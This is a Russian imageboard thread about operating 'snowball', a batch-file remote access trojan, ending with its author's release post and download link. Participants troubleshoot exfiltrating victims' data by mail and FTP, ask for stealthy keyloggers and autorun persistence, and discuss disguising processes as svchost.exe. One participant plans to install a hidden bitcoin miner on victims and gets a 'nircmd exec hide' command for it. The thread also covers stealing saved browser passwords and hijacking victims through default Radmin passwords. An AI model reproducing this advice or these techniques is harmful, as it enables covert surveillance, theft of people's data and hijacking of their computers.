Не, можно cmd.exe скопировать куда-нибудь под именем svchost.exe и через него запустить этот bat.
Кто-нибудь решил проблему с тупящим иногда postie и файлами на ftp в 0 байт? Особенно, блядь, второе. Три хомяка не хотят слать на мыло, на фтп присылают это говно. Обидно, вроде работает, а толку ноль.
>>43193
Если будет время, напишу батник, который ты запустишь при помощи obey, и он попробует отправить письмо разными средствами: postie, blat, zerat, ncftp, ftps.exe и еще чем вспомню. И письма разного содержания попробуем. Короче, попытаемся методом тыка выявить проблему.
>>42211
Автор, ты охуенен!
Напиши на фейкопочту, если пожелаешь. [email protected]
Посоны, посоветуйте годный кейлогер.
поцы как на убунту запустить ??
То, что он как бешеный отправляет результаты команд - нормально? Я думал, он выполнит и будет ждать новой команды.
И да, куда твой Обей.тхт из папки "пароли от браузеров" девает найденные пароли?
Мимопроходилнуб.
>>43268
> как бешеный отправляет результаты команд
М-м-м... "multiple" использовал? Иначе я не знаю, как этого добиться. Он и должен ждать новой команды.
> девает найденные пароли
Присылает в письме. Когда выполняешь "obey", он присылает то, что выводится в командную строку.
>>43269
multiple не делал, просто sugarcube или как-то так, как в примерах. С кодом. Код даже не изменяю, он выполняет всё, что в cheese. Перевёл его в спящий режим, теперь нормально. Но знать как его остановить надо…
Посоветуйте кто-нибудь хороший кейлоггер, а? obey.txt годноту почти не палит (как я понял, не видит пароли от https, браузер maxthon вообще не обрабатывает, вроде).
>>43269
Но всё равно, ОП, ты офигенен. А может ещё и кейлоггер на .bat напишешь и включишь его в набор?
Кстати, реквест: отправка превьюшки скриншота вместе с самим скриншотом. Ибо интернет не позволяет по два мегабайта все скриншоты смотреть. Надо превью, и если там что-то интересное — тогда уже в полном размере грузить. Что думаешь, ОП?
>>43272
Думаю, надо включить сжатие в настройках.
settings
shrink=yes
Как с ведроида управлять можно? Total Commander умеет в FTP, а чем править файлы в OEM866? То есть сохранять и открывать их. Jota Text Editor умеет какой-то IBM866, но мне кажется, это не оно.
Кстати, может кому-то поможет: когда я решил проверить Snowball на себе, оно нифига не работало. Попробовал зайти на свой сайт браузером (на wen.ru он был), а там ошибка 118. Не знаю, что это, но открылось только оперой через турбо, да и то медленно. Переставил сайт на narod.ru (или ucoz, фиг их знает), заработало. Короче, не знаю, что такое 118, но к некоторым сайтам доступ бывает блокирован, и тогда бот не может получить cheese.txt. Учтите. А ОП может подумать пока об этой ошибке. Сейчас всё работает. Кроме того, что он отправляет результаты непрерывно, хотя multiple не было.
>>43270
>obey.txt годноту почти не палит
Он вытаскивает только сохранённые пароли из браузеров, используя http://www.nirsoft.net/utils/web_browser_password.html. Для тех, что не сохранены - нужен либо кейлоггер, либо инжект в браузер и перехват из него.
>>43216
Не знаю, какой сейчас актуальный кейлоггер, раньше использовал Ardamax.
>>43267
Wine поставить. Вообще он не для ЖМУ/Пинус же.
>>43271
>кейлоггер на .bat напишешь
Лол.
>>43276
>на narod.ru (или ucoz)
Народ отдали укозу.
>>43276
wen.ru вообще чудит. По возможности лучше его не использовать.
> чем править файлы в OEM866
В общем-то, если ты не используешь кириллицу, кодировка пох (ну, кроме разве что utf-8 или какая-нибудь там экономная).
> отправляет результаты непрерывно
Не представляю, как такое может быть.
Стори: показывал знакомому, ему же и установили, для проверки. Почта на @mail.ru была. Не взлетел. Долго искал проблему, по процесс хакеру понял, что всё работает, это postie нифига не отправляет. Продолжал, когда вылезет процесс postie, навёл мышку, появилось сообщение на пару секунд, успел сделать скриншот. Сообщение показывало с какими параметрам вызывается postie. Переписал в cmd. Какая-то ошибка получилась, не помню какая, но погуглив я понял, что проблема в русском имени компьютера. И точно, переименовал комп из Нейм-ПК в Name-PC, и alert ушёл. Я возрадовался, но опять фейл: кроме алерта ничего не приходит. Опять посмотрел ключи postie, ввёл, вышла authentication failed, ошибка. Но ЯМАМАЙКЛЯНУСЬДАА логин и пароль были верные. Решил, что майл.ру опять косячит, зарегистрировал ещё одно мыло на @list.ru (у самого так, всё работает, и да, я тот анон, у которого непрерывная отправка без multiple), ввёл новое мыло в cheese, и Аллилуйя!
Мораль: иногда регистрация нового мыла решает проблемы. Мыло лучше на @list.ru (по статистике говорю, лол).
ОП, посмотри что там с русскими именами компьютера. Неужели русские символы кладут alert? Он дефолтно в 1251, если что. Может, надо в 866 перевести его.
>>43284
> с русскими именами компьютера
Тррри тысячи черрртей... Как же это? Вроде имя компьютера там нигде не отсвечивает.
Что ж, спасибо за дебаг, буду искать.
Алсо, посмотрел сегодня логи того товарища, у которого месяц назад личинку установил - так она месяц не могла скачать wget.
>>43290
Рад помочь.
Кстати, нашёл кейлоггер, ещё не испытал на жертве, но в общем должно работать. .exe файл, можно запустить в скрытом режиме через ключ, весит ~150 кб. Создаёт в текущей директории папку, в ней логи. К чему я это… Надо посмотреть, как вирусы реагируют, если ничего не говорят — предлагаю включить в комплектацию.
А команда obey, скачав obey.txt, запускает его в скрытом режиме, или пользователь может увидеть, как она выполняется? Я в делах, связанных с командной строкой, нуб ещё. Может, там надо ключи всякие установить, типа -quiet, -silent, или @echo off в начале?
Не заходил на доску уже год, думал все умерли давно. Сап, я люблю тебя, Йоба-тян.
Давно я тут у вас не был. Хорошо сделал, малаца. Я тут тоже сюрпризик вам готовлю.
А как можно прогу добавить в автозагрузку? С ключом (параметром). Помоги, ОП. Нужно скрытно кейлоггер добавить в автозапуск (в скрытном режиме).
>>43308
Чтобы кейлоггер запустился скрытно, нужно из консоли его с ключом /h вызвать. В этом и проблема.
Господа посоны хакиры, а чем плохо пунтосвичер в качестве кейлоггера?
>>43310
Покажи как поставить его, чтобы безпалевно работал, например.
>>43311
А где он палится? Иконка и прочие свистелки отключаются же.
Ошибка на скрине вызвана сноуболлом?
>>43313
После этого скрина юнит перестал отвечать. Может, бот вылетел…
>>43314
Нет, скорее, мылору опять какую-то ерунду мутит. Как же я его ненавижу.
>>43306
Конечно настоящий. Сюрприз будет ровно в 00.00
>>43318
Спасибо, няша.
Только всё равно не понятно, отчего вдруг на каждом скрине эта ошибка… Жестоко палится бот. Да, тот юнит снова отвечает и стабильно шлёт скриншоты… с той самой ошибкой.
>>43313
Это, судя по тексту, от CDO.Message. Ну, то есть, ты там не единственный хакир на этой машине, вот она и не отвечает больше.
>>43319
> отвечает и стабильно шлёт скриншоты… с той самой ошибкой
Но раз ответ приходит, значит, работает? Ты вот что, запроси у него info и посмотри в списке процессов что есть, может у него какой-нибудь почтовый клиент на сервер тычется и не может проникнуть. Автозагрузку посмотри также.
Трипкод SL-куна, как он сам писал - Nahmanides.
У нас с тех пор тут каждый второй его использует.
>>43322
Итальянец, а он у тебя правда пиздил хомяков с третьим радмином?
>>43330
Он у меня спиздил всех хомяков, на радминах которых стоял дефольтный пароль, потому-что я прописал пароль и логин для мыла привязанному к ипрату в стрэнжлов (провальная попытка автоматизировать ипрат). Случилось так что он насканил именно того хомяка на котором находился мой изменённый странжлов и увидел всё это.
Алсо через мыло он спиздил мой номер телефона лол.
Вот так-то я ступил :3
>>43332
Дефолтный пароль - это какой? Ты оставлял хомяков со вторым радмином 12345678 и своим ипратом?
посоны, а как скачать файл, если в пути ебаная хохлядская i?
>>43284
Два чая этому господину. Смена почту иногда помогает.
>>43333
У хомяков на которых мне было похуй да, себе я забирал только няшек.
>>43341
Зря ты так. Почтовый пароль из сл-пакового ипрата тоже вытаскивается на раз-два. Попадался, кстати, по уму допиленый вариант, в котором на отправку и на получение разные эккаунты.
>>43348
Да похуй уже, сл не пользуюсь, аккаунт мыла забанили.
Теперь личинкой Ёбы пользуюсь, за что ему огромное спасибо :3
Просто интересно что в сл2 должно было быть, сл-кун вроде обещал там овер 9к вкусных плюшек.
А что сервак ипрата еще работает?
>>43348
он же в экзешник ипрата вшивается, а в sl.cmd не используется
>>43357
Экзешник потрошится подручными средствами за минуту.
>>43351
В той хуите, которую сренжлов сделал для извращенцев со своего ракофорума, ничего интересного нет. Дроппер, там, на vbs, хуё-моё. Ну они со своими самоделками на пауэрбейсике и от этого, правда, охуели.
>>43323
Да пошёл ты нахуй со своим сюрпризом, пидор.
>>43374
Ключ лежит в соседней секции от зашифрованого им скрипта например. Но вообще, всё гораздо проще.
%%ntsd -p pid
.dump -f c:\xynta.txt
notepad xynta.txt
search - vbcrlf%%
>>43375
Ну, разметка на двачах посложнее такого хака, конечно.
>>43374
Да хоть AES. Ему же надо когда-то расшифровываться, не так ли?
>>43306
Нет, он не тян, он пухленький няш, а тян - не обязательно девушка, просто ласковое обращение (хоть и достаточно редко так используется).
отклеилось
>>43396
>>43397
>19.01.2012
Ох, время-то как летит...
А вот как всё начиналось:
http://rghost.ru/46042457
Хотя честно говоря мне чуточку стыдно за то, что я тогда делал. Надеюсь, тот юноша, который «посылку с бугуртом получил» больше на меня не сердится.
>>43411
Ёба кажеться я уже спрашивал, но забыл что ты мне ответил.
Спрошу еще раз.
Как залить биткоин майнер на хомяков?
скачать через wget, ок.
А как быть если там инсталлер, или папка с файлами? Использовать зип архив? Какими командами потом его распаковать? И куда надёжнее всего его ложить чтобы не спалили?
Еще надо-бы его прописать в автозагрузку, а то какой профит тогда. Как это сделать?
ЗЫ, всё это дело конечно будет запускаться в скрытом режиме, да?
Алсо как можно изменить имя майнера в диспетчере задач чтобы ок не палился как какой-нибудь miner.exe а стал например svchost.exe или каким-нибудь WinLogon.exe?
>>43475
>если там инсталлер, или папка с файлами
Посмотри в хелпе команды takefiles и takedir, однако лучше всего было бы тебе сделать собственный инсталлер (например, winrar/sfx), который бы был единым файлом и при запуске устанавливал как надо тебе.
>запускаться в скрытом режиме
Можешь попробовать запускать через nircmd командой "nircmd.exe exec hide C:\miner\miner.exe", например. В любом случае, проверь на виртуалке неоднократно.
>>43482
Потому что выхлоп уже копеек 10 в день с хомяка. Иди лучше в диабле золото майни, повыгоднее будет.
>>43488
Смотри, десять хомяков - уже рупь. А это в месяц тридцатка. Бутылка пива ёпта!
>>43501
А нихуя, через месяц будет уже не 10 копеек, а две. Энтропия сложность растёт.
Если настроить майнер под GPU и прикрутить личинку к какому нибудь Battlefield 3 Hack всё норм будет.
Версия snowball_2.6. Написанная на бат личинка, позволяющая удаленно управлять чужим компьютером. Умеет делать скриншот, фото с вебкамеры, получать список файлов, красть файлы, выполнять произвольный код и еще кучу всяких приятностей. Проста в установке, любовна и прельстива для антивирусов.
В комплекте - несколько вспомогательных программ.
Что нового в этой версии:
snowball_2.6 Новая команда "thumbs".
snowball_2.5 Новая команда "collect".
snowball_2.4 По вашим просьбам: личинка извещает при первой установке
snowball_2.3 Личинка сообщает, если ты управляешь ею в первый раз
Подробнее:
Команда "thumbs"
Создание превью из изображений.
При получении этой команды бот составляет список всех файлов (изображений), подходящих по маске, указанной 9 и далее строками, затем при помощи программы nconvert преобразует в картинки формата jpg с разрешением 160*160 и качеством jpg 50, упаковывает в архив и отправляет. В каждую папку будет вложен файл "path.txt", где будет указан полный путь к папке - для удобства копирования.
Команда "collect"
Сбор файлов по маске.
При получении этой команды бот составляет список всех файлов, подходящих по маске, указанной 9 и далее строками, затем вычисляет их общий размер и отправляет информацию об этом. Если пользователь отправляет подтверждение, указанные файлы сжимаются и отправляются. Если отправить команду "collect" без дополнительных параметров, будет прислана информация о ранее проведенном поиске, либо ответ "no data", если поисков еще не было.
Скачать: http://rghost.ru/45014526
Примечание: я не стал запаковывать хелп в единый файл .chm, пусть будет пачкой .html. Для прочтения следует открыть index.html.
Предыдущий тхреад: >>24748 (много полезного, кто интересуется)